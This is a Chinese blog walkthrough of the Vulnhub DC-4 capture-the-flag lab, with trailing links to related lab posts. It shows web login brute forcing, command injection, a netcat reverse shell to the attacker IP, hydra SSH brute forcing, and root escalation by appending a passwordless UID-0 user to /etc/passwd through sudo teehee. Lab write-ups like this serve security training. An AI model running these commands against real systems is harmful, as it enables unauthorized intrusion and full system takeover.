Vulnhub靶场 | DC系列 - DC4

最新推荐文章于 2024-08-31 21:24:29 发布
最新推荐文章于 2024-08-31 21:24:29 发布
阅读量494 收藏 8
点赞数 20
分类专栏: 一起来打靶!~ 文章标签: 网络 数据库 服务器 dc靶场 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45305211/article/details/141730432
版权

文章目录

DC-4

环境搭建

  1. 靶机镜像下载地址:https://vulnhub.com/entry/dc-4,313/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

经判断,目标主机IP地址为192.168.10.150。

扫描开放的服务。

┌──(root💀kali)-[~/桌面]
└─# nmap -sS 192.168.10.150

查看下端口对应的服务版本。

┌──(root💀kali)-[~/桌面]
└─# nmap -sV -p 22,80  192.168.10.150

尝试搜索OpenSSH和nginx相关的exp,但是貌似没有适合的~

扫一下网站目录,也没有特别的地方~

没办法了,对网站用户名密码爆破一下吧

爆破出来的用户名为admin,密码为happy,成功登录(也许这里真的是需要爆破来突破)。

登录成功

点击“Command”看一看~

发现,里面有三个功能,可以执行3条系统命令:

  • ls -l
  • du -h
  • df -h

抓个包,看看能不能修改执行的系统命令。

这里确实可以修改~

换成其他命令执行看看~可以正常返回结果~

开始写马~使用nc建立反弹连接

nc+192.168.10.146+4444+-e+/bin/bash

成功建立反弹连接

使用python获得下交互shell

python -c "import pty; pty.spawn('/bin/bash');"

接下来提权。

收集一下版本信息~

www-data@dc-4:/usr/share/nginx/html$ uname -a
www-data@dc-4:/usr/share/nginx/html$ cat /proc/version
...

搜了下相关内核漏洞提权脚本,没有~

搜一搜设置了SUID的文件:

www-data@dc-4:/usr/share/nginx/html$ find / -perm -u=s 2>/dev/null

貌似没有可以提权的命令.

查看下有哪些用户:

发现有三个用户:charles、jim、sam

查看了下,charles、sam的家目录下没有什么东西。

jim家目录下有两个文件,一个目录。

mbox没有权限访问,backups中有个旧密码备份?

/home/jim/backups/old-passwords.bak

拿这个密码爆破一下吧~

┌──(root💀kali)-[~/桌面]
└─# hydra -l jim -P ./ps.txt 192.168.10.150 ssh

结果如下

jim的密码是jibril04。成功登录~

看一下jim的sudo授权,并没有可利用的~

看一下mbox,有权限查看,是一封邮件。

有邮件,说明该系统时候邮件系统的,查看一下邮件

查看邮件jim,是charles发来的一封邮件,告诉了jim密码:^xHhA&hvim0y

使用该密码切换到charles

先看一下有没有sudo授权

发现,可以无密码执行/usr/bin/teehee

teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户

向passwd文件中追加一个超级用户。

charles@dc-4:~$ echo "hack::0:0:::/bin/bash" | sudo teehee -a  /etc/passwd

切换到hack用户。

成功拿到flag。

🔗Reference:DC-4

_leyilea
关注
  • 20
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1172
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
Vulnhub靶场 | DC系列 - DC2
哦 卷!
07-13 895
WPScan能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。提示告诉我们,不能再利用WordPress了~ 但是通过刚该是的namp扫描只扫到了一个80端口(这里注意:默认扫描的端口是常见的 1000个端口)。而因为是WordPress,比较知名的cms,所以可以先尝试一下默认的后台地址,果然,有一个7744端口,并且对应的服务是ssh。
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 364
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
Vulnhub靶场 | DC系列 - DC3
哦 卷!
08-30 430
浏览器访问目标网站的 error.php文件(写入马的文件):http://192.168.10.149/templates/protostar/error.php。在msf中搜索joomla相关的脚本,使用joomla_version探测下joomla的版本。文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。根据joomla的特性,可以在模版中编辑模版文件,所以可以利用这一点进行写马。查找一下设置了suid的文件,并没有可以提权的命令。但是获取到的shell权限比较低。
Vulnhub靶场 DC系列 DC-2靶场
sdfsergfr的博客
12-12 726
Vulnhub靶场 DC系列 DC-2靶场
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4510
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
Vulnhub靶场----4、DC-4
七天
02-22 958
Vulnhub-DC4
Vulnhub靶场----9、DC-9
七天
03-03 776
Vulnhub-DC9
vulnhub靶场DC-3
qq_58091216的博客
01-08 1313
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
网络压缩之网络剪枝(network pruning)
最新发布
前行居士
08-31 415
网络剪枝(network pruning)就是要把网络里面的一些参数剪掉。剪枝就是修剪的意思,把网络里面的一些参数剪掉。为什么可以把网络里面的一些参数剪 掉呢?这么大的网络里面有很多很多的参数,每一个参数不一定都有在做事。参数这么多的 时候,也许很多参数只是在划水,什么事也没有做。这些没有做的参数放在那边,就只是占空 间而已,浪费计算资源而已。为何就把它们剪掉呢?所以网络剪枝就是把一个大的网络中没 有用的那些参数把它找出来,把它扔掉。人刚出生的时候,脑袋是空空的,神经元跟神经元间 没什么连接
33.python socket
笔生花的博客
08-27 1719
python socket 心跳包 数据包
Linux网络:TCP & UDP socket
盒马的博客
08-27 1219
讲解Linux中TCP与UDP的套接字相关接口
SSH是什么?
思索的涟漪,突破自我
08-28 660
SSH的工作原理可以简单理解为,它在用户和服务器之间建立了一条“安全隧道”,通过这条隧道传输的数据都被加密,防止中间人攻击或数据泄露。公钥认证的原理是用户在本地生成一对密钥,其中公钥存放在服务器上,私钥则保存在本地。在现代互联网环境中,安全性越来越受到重视,SSH凭借其强大的加密能力和灵活的认证方式,成为了维护网络安全的重要工具之一。使用SSH时,用户只需要在终端或命令行界面输入简单的命令,就可以连接到远程服务器,执行各种操作,如文件传输、远程执行命令,甚至通过端口转发实现复杂的网络功能。
【CVPR‘24】BP-Net:用于深度补全的双边传播网络,新 SOTA!
梁瑛平的博客
08-28 594
深度补全任务旨在从稀疏的深度测量数据和同步的彩色图像中生成密集的深度图。现有的最先进方法多为基于传播的,通常作为对初始估计的密集深度的迭代改进。然而,这些初始深度估计通常直接将卷积层应用于稀疏深度图。在本文中,我们提出了一种双边传播网络(BP-Net),在最早阶段进行深度传播,以避免直接在稀疏数据上进行卷积。具体而言,我们的方法通过一个非线性模型从附近的深度测量中传播目标深度,该模型的系数由一个多层感知器生成,并基于辐射差异和空间距离进行调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值